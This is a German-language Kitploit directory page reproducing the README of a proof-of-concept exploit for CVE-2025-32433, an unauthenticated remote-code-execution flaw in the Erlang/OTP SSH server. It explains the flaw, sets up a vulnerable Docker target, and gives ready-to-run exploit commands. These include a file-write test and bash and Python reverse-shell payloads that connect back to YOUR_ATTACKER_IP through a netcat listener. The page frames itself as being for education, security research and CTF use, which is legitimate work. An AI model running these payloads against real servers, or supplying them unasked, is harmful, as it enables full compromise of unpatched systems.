Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32433-PoC — Proof-of-Concept-Exploit für CVE-2025-32433, der eine nicht authentifizierte Remote-Code-Ausführung in Erlang/OTP SSH ermöglicht. Enthält Docker-Setup und Reverse-Shell-Payloads für Sicherheitsforschung und CTF-Herausforderungen. | Kitploit
Tools/GitHubGitHub/niteeshpujari/cve-2025-32433-poc
SchwachstellenanalyseExploitationCTFPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubniteeshpujari/cve-2025-32433-poc

CVE-2025-32433-PoC

Proof-of-Concept-Exploit für CVE-2025-32433, der eine nicht authentifizierte Remote-Code-Ausführung in Erlang/OTP SSH ermöglicht. Enthält Docker-Setup und Reverse-Shell-Payloads für Sicherheitsforschung und CTF-Herausforderungen.

Repository anzeigen
712vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-32433: Erlang/OTP SSH – Nicht authentifizierte RCE PoC

CVE-2025-32433

Dieses Repository enthält einen Proof-of-Concept (PoC) für CVE-2025-32433, eine kritische, nicht authentifizierte Schwachstelle zur Remotecodeausführung (RCE), die die SSH-Serverimplementierung in Erlang/Open Telecom Platform (OTP) betrifft. Dieser PoC ist für Bildungszwecke, Sicherheitsforschung und Capture-The-Flag (CTF)-Herausforderungen konzipiert.

⚠️ Haftungsausschluss – Nur für Bildungs- und ethische Zwecke ⚠️

Dieser PoC wird ausschließlich zu Bildungs- und ethischen Hacking-Zwecken bereitgestellt. Er ist für den Einsatz in kontrollierten Umgebungen wie isolierten virtuellen Maschinen oder CTF-Plattformen vorgesehen, für die Sie eine ausdrückliche Genehmigung zur Durchführung von Sicherheitstests haben.

VERWENDEN SIE DIESEN PoC NICHT gegen ein System, das Sie nicht besitzen oder für das Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben. Unautorisierter Zugriff oder Ausnutzung von Computersystemen ist illegal und unethisch. Die Autoren und Betreuer dieses Repositorys sind nicht verantwortlich für Missbrauch oder Schäden, die durch diesen Code verursacht werden.


📊 Schwachstellenübersicht

AttributDetails
CVE IDCVE-2025-32433
SchwachstellentypNicht authentifizierte Remotecodeausführung (RCE)
CVSS v3.1 Punktzahl10.0 (Kritisch)
Betroffene SoftwareErlang/OTP SSH-Server (ssh)
Betroffene VersionenOTP-27.3.2 und früher
OTP-26.2.5.10 und früher
OTP-25.3.2.19 und früher
Versionen ab OTP 17.0 und älter
Behobene VersionenOTP-27.3.3, OTP-26.2.5.11, OTP-25.3.2.20

Technische Details

Die Schwachstelle liegt in der Art und Weise, wie der Erlang/OTP SSH-Server SSH-Protokollnachrichten während der Vorauthentifizierungsphase verarbeitet. Konkret gelingt es dem Server nicht, die SSH-Protokollsequenz ordnungsgemäß durchzusetzen, sodass ein entfernter, nicht authentifizierter Angreifer manipulierte SSH_MSG_CHANNEL_OPEN- und SSH_MSG_CHANNEL_REQUEST-Nachrichten senden kann. Dies ermöglicht es dem Angreifer, einen Sitzungskanal zu öffnen und beliebige Erlang-Befehle auszuführen (die wiederum Systembefehle ausführen können), ohne gültige Anmeldedaten bereitzustellen. Wenn der SSH-Daemon mit erweiterten Rechten läuft (z.B. als root), kann eine erfolgreiche Ausnutzung zu einer vollständigen Systemkompromittierung führen.


🛠️ Einrichtung: Erstellen der verwundbaren Umgebung (Docker)

Der einfachste Weg, einen verwundbaren Erlang/OTP SSH-Server einzurichten, ist die Verwendung der bereitgestellten Dockerfile.

  1. Klonen Sie dieses Repository:

    root@kitploit:~
    git clone https://github.com/NiteeshPujari/CVE-2025-32433-PoC.git
    cd CVE-2025-32433-PoC
    
  2. Erstellen Sie das Docker-Image: Dieser Befehl kompiliert eine verwundbare Version von Erlang/OTP (OTP-26.2.5.10) und konfiguriert den SSH-Server.

    root@kitploit:~
    docker build -t erlang-ssh-vulnerable .
    
  3. Starten Sie den Container mit dem verwundbaren Server: Dies startet den Erlang/OTP SSH-Server im Hintergrund und lauscht auf Port 2222.

    root@kitploit:~
    docker run -d --name erlang-ssh-target -p 2222:2222 erlang-ssh-vulnerable
    
    • -d: Startet den Container im Hintergrund (detached mode).
    • --name erlang-ssh-target: Weist dem Container einen Namen für die einfache Verwaltung zu.
    • -p 2222:2222: Mapped Host-Port 2222 auf Container-Port 2222.
  4. Überprüfen Sie, ob der Container läuft:

    root@kitploit:~
    docker ps
    

🚀 Verwendung: Ausführen des PoC-Skripts

Das Skript cve_2025_32433_exploit.py kann interaktiv oder mit Befehlszeilenargumenten ausgeführt werden.

Interaktiver Modus

Wenn Sie das Skript ohne Argumente ausführen, werden Sie zur Eingabe der erforderlichen Informationen aufgefordert.

  1. Stellen Sie sicher, dass der verwundbare Docker-Container läuft.
  2. Führen Sie das Python-PoC-Skript aus:
    root@kitploit:~
    python3 cve_2025_32433_exploit.py
    
  3. Folgen Sie den interaktiven Eingabeaufforderungen: Das Skript fragt nach:
    • Ziel-IP-Adresse: (z. B. 127.0.0.1, wenn Docker auf demselben Host angegriffen wird).
    • Ziel-Port: (z. B. 2222).
    • Auszuführender Befehl: (Leer lassen für den Standardtestbefehl).

Beispiel 1: Testen der RCE durch Erstellen einer Datei

Dies ist das Standardverhalten, wenn Sie die Eingabeaufforderung im interaktiven Modus leer lassen. Es erstellt eine Datei /tmp/note.txt auf dem Ziel.

  1. Führen Sie den Exploit aus:
    root@kitploit:~
    python3 cve_2025_32433_exploit.py --target-ip 127.0.0.1 --target-port 2222 --command 'file:write_file("/tmp/note.txt", "Exploit Ran!").'
    
  2. Überprüfen Sie, ob die Datei auf dem Ziel erstellt wurde:
    root@kitploit:~
    docker exec -it erlang-ssh-target cat /tmp/note.txt
    
    Sie sollten die Ausgabe Exploit Ran! sehen.

Beispiel 2: Erhalten einer Reverse Shell

Um eine Reverse Shell zu erhalten, müssen Sie ein Payload bereitstellen, das sich mit einem Listener auf Ihrem Rechner verbindet.

  1. Starten Sie einen Netcat-Listener auf Ihrem Angriffsrechner (z. B. Kali Linux) auf dem von Ihnen gewählten Port.

    root@kitploit:~
    nc -lvnp 4444
    

    Wichtig: Stellen Sie sicher, dass Ihre Firewall (z.B. ufw) auf Ihrem Angriffsrechner eingehende Verbindungen auf diesem Port zulässt. sudo ufw allow 4444/tcp

  2. Führen Sie das PoC-Skript mit dem Reverse-Shell-Payload aus. Ersetzen Sie YOUR_ATTACKER_IP durch die IP-Adresse Ihres Rechners.

    • Bash-Reverse-Shell:

      root@kitploit:~
      python3 cve_2025_32433_exploit.py --target-ip 127.0.0.1 --target-port 2222 --command 'os:cmd("bash -i >& /dev/tcp/YOUR_ATTACKER_IP/4444 0>&1").'
      
    • Python-Reverse-Shell (oft zuverlässiger):

      root@kitploit:~
      python3 cve_2025_32433_exploit.py --target-ip 127.0.0.1 --target-port 2222 --command 'os:cmd("python3 -c ''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_ATTACKER_IP\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);''").'
      
  3. Überprüfen Sie Ihren Netcat-Listener. Sie sollten eine Verbindung erhalten und eine Shell auf dem Zielcontainer haben.


🧹 Bereinigung

Um den Docker-Container und das Image zu stoppen und zu entfernen:

root@kitploit:~
# Stop and remove the container
docker stop erlang-ssh-target
docker rm erlang-ssh-target

# Optional: remove the image as well
docker rmi erlang-ssh-vulnerable
Tool herunterladen